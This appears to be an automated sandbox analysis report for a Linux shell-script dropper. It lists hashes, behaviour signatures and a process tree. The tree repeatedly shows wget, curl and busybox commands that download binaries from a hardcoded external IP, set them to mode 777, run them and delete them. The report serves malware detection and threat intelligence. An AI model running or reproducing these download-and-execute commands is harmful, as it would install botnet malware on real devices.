Analysis
-
max time kernel
82s -
max time network
84s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
-
submitted
20/11/2024, 02:58
General
-
Target
852f1497efb82b5a4949ee078e3b7c8c457cec8be2e57d90cb3ce4ba3de5ad3a.sh
-
Size
10KB
-
MD5
c10bbe8f664bc5a28f253df4496837b5
-
SHA1
8dd3a58cc7bce0d827f0c2508d39d73e94c70752
-
SHA256
852f1497efb82b5a4949ee078e3b7c8c457cec8be2e57d90cb3ce4ba3de5ad3a
-
SHA512
fa955f79e857460cdb797e5d40c3a8cb0c5bedec13caac1e431fee443ece6d441e35b0d68975e0ebd1a9607e6b8e51261ea467cccbf62d2ed71306c8bb6fd204
-
SSDEEP
192:mrlrNr8txjN1p7COBUcgksxoY2QoYq7tctktlAsnBBz7dFzy7EM78EAb7/LYaz3Z:4RZ8txZNTDK8gXRZ8tx/l
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Reads runtime system information 28 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/852f1497efb82b5a4949ee078e3b7c8c457cec8be2e57d90cb3ce4ba3de5ad3a.sh/tmp/852f1497efb82b5a4949ee078e3b7c8c457cec8be2e57d90cb3ce4ba3de5ad3a.sh1⤵
-
/bin/rm/bin/rm bins.sh2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO2⤵
-
-
/bin/chmodchmod 777 lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO2⤵
- File and Directory Permissions Modification
-
-
/tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO./lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO2⤵
- Executes dropped EXE
-
-
/bin/rmrm lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat2⤵
-
-
/bin/chmodchmod 777 AbZDorGA28H0E3dHfaRN80ddRvv7THmnat2⤵
- File and Directory Permissions Modification
-
-
/tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat./AbZDorGA28H0E3dHfaRN80ddRvv7THmnat2⤵
- Executes dropped EXE
-
-
/bin/rmrm AbZDorGA28H0E3dHfaRN80ddRvv7THmnat2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN2⤵
-
-
/bin/chmodchmod 777 KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN2⤵
- File and Directory Permissions Modification
-
-
/tmp/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN./KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN2⤵
- Executes dropped EXE
-
-
/bin/rmrm KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp2⤵
-
-
/bin/chmodchmod 777 MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp2⤵
- File and Directory Permissions Modification
-
-
/tmp/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp./MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp2⤵
- Executes dropped EXE
-
-
/bin/rmrm MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z2⤵
-
-
/bin/chmodchmod 777 DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z2⤵
- File and Directory Permissions Modification
-
-
/tmp/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z./DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z2⤵
- Executes dropped EXE
-
-
/bin/rmrm DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE72⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE72⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE72⤵
-
-
/bin/chmodchmod 777 gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE72⤵
- File and Directory Permissions Modification
-
-
/tmp/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7./gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE72⤵
- Executes dropped EXE
-
-
/bin/rmrm gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE72⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu2⤵
-
-
/bin/chmodchmod 777 Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu2⤵
- File and Directory Permissions Modification
-
-
/tmp/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu./Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu2⤵
- Executes dropped EXE
-
-
/bin/rmrm Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z2⤵
-
-
/bin/chmodchmod 777 lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z2⤵
- File and Directory Permissions Modification
-
-
/tmp/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z./lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z2⤵
- Executes dropped EXE
-
-
/bin/rmrm lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r2⤵
-
-
/bin/chmodchmod 777 iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r2⤵
- File and Directory Permissions Modification
-
-
/tmp/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r./iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r2⤵
- Executes dropped EXE
-
-
/bin/rmrm iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c12⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c12⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c12⤵
-
-
/bin/chmodchmod 777 iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c12⤵
- File and Directory Permissions Modification
-
-
/tmp/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1./iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c12⤵
- Executes dropped EXE
-
-
/bin/rmrm iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c12⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV2⤵
-
-
/bin/chmodchmod 777 oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV2⤵
- File and Directory Permissions Modification
-
-
/tmp/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV./oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV2⤵
- Executes dropped EXE
-
-
/bin/rmrm oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ2⤵
-
-
/bin/chmodchmod 777 gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ2⤵
- File and Directory Permissions Modification
-
-
/tmp/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ./gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ2⤵
- Executes dropped EXE
-
-
/bin/rmrm gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf2⤵
-
-
/bin/chmodchmod 777 h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf2⤵
- File and Directory Permissions Modification
-
-
/tmp/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf./h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf2⤵
- Executes dropped EXE
-
-
/bin/rmrm h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj2⤵
-
-
/bin/chmodchmod 777 gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj2⤵
- File and Directory Permissions Modification
-
-
/tmp/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj./gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj2⤵
- Executes dropped EXE
-
-
/bin/rmrm gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV2⤵
-
-
/bin/chmodchmod 777 oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV2⤵
- File and Directory Permissions Modification
-
-
/tmp/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV./oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV2⤵
- Executes dropped EXE
-
-
/bin/rmrm oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ2⤵
-
-
/bin/chmodchmod 777 gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ2⤵
- File and Directory Permissions Modification
-
-
/tmp/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ./gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ2⤵
- Executes dropped EXE
-
-
/bin/rmrm gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf2⤵
-
-
/bin/chmodchmod 777 h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf2⤵
- File and Directory Permissions Modification
-
-
/tmp/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf./h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf2⤵
- Executes dropped EXE
-
-
/bin/rmrm h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj2⤵
-
-
/bin/chmodchmod 777 gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj2⤵
- File and Directory Permissions Modification
-
-
/tmp/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj./gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj2⤵
- Executes dropped EXE
-
-
/bin/rmrm gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO2⤵
-
-
/bin/chmodchmod 777 lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO2⤵
- File and Directory Permissions Modification
-
-
/tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO./lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO2⤵
- Executes dropped EXE
-
-
/bin/rmrm lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat2⤵
-
-
/bin/chmodchmod 777 AbZDorGA28H0E3dHfaRN80ddRvv7THmnat2⤵
- File and Directory Permissions Modification
-
-
/tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat./AbZDorGA28H0E3dHfaRN80ddRvv7THmnat2⤵
- Executes dropped EXE
-
-
/bin/rmrm AbZDorGA28H0E3dHfaRN80ddRvv7THmnat2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN2⤵
-
-
/bin/chmodchmod 777 KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN2⤵
- File and Directory Permissions Modification
-
-
/tmp/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN./KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN2⤵
- Executes dropped EXE
-
-
/bin/rmrm KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp2⤵
-
-
/bin/chmodchmod 777 MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp2⤵
- File and Directory Permissions Modification
-
-
/tmp/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp./MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp2⤵
- Executes dropped EXE
-
-
/bin/rmrm MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z2⤵
-
-
/bin/chmodchmod 777 DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z2⤵
- File and Directory Permissions Modification
-
-
/tmp/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z./DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z2⤵
- Executes dropped EXE
-
-
/bin/rmrm DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE72⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE72⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE72⤵
-
-
/bin/chmodchmod 777 gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE72⤵
- File and Directory Permissions Modification
-
-
/tmp/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7./gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE72⤵
- Executes dropped EXE
-
-
/bin/rmrm gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE72⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu2⤵
-
-
/bin/chmodchmod 777 Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu2⤵
- File and Directory Permissions Modification
-
-
/tmp/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu./Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu2⤵
- Executes dropped EXE
-
-
/bin/rmrm Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z2⤵
-
-
/bin/chmodchmod 777 lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z2⤵
- File and Directory Permissions Modification
-
-
/tmp/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z./lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z2⤵
- Executes dropped EXE
-
-
/bin/rmrm lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r2⤵
-
-
/bin/chmodchmod 777 iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r2⤵
- File and Directory Permissions Modification
-
-
/tmp/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r./iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r2⤵
- Executes dropped EXE
-
-
/bin/rmrm iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c12⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c12⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c12⤵
-
-
/bin/chmodchmod 777 iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c12⤵
- File and Directory Permissions Modification
-
-
/tmp/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1./iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c12⤵
- Executes dropped EXE
-
-
/bin/rmrm iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c12⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97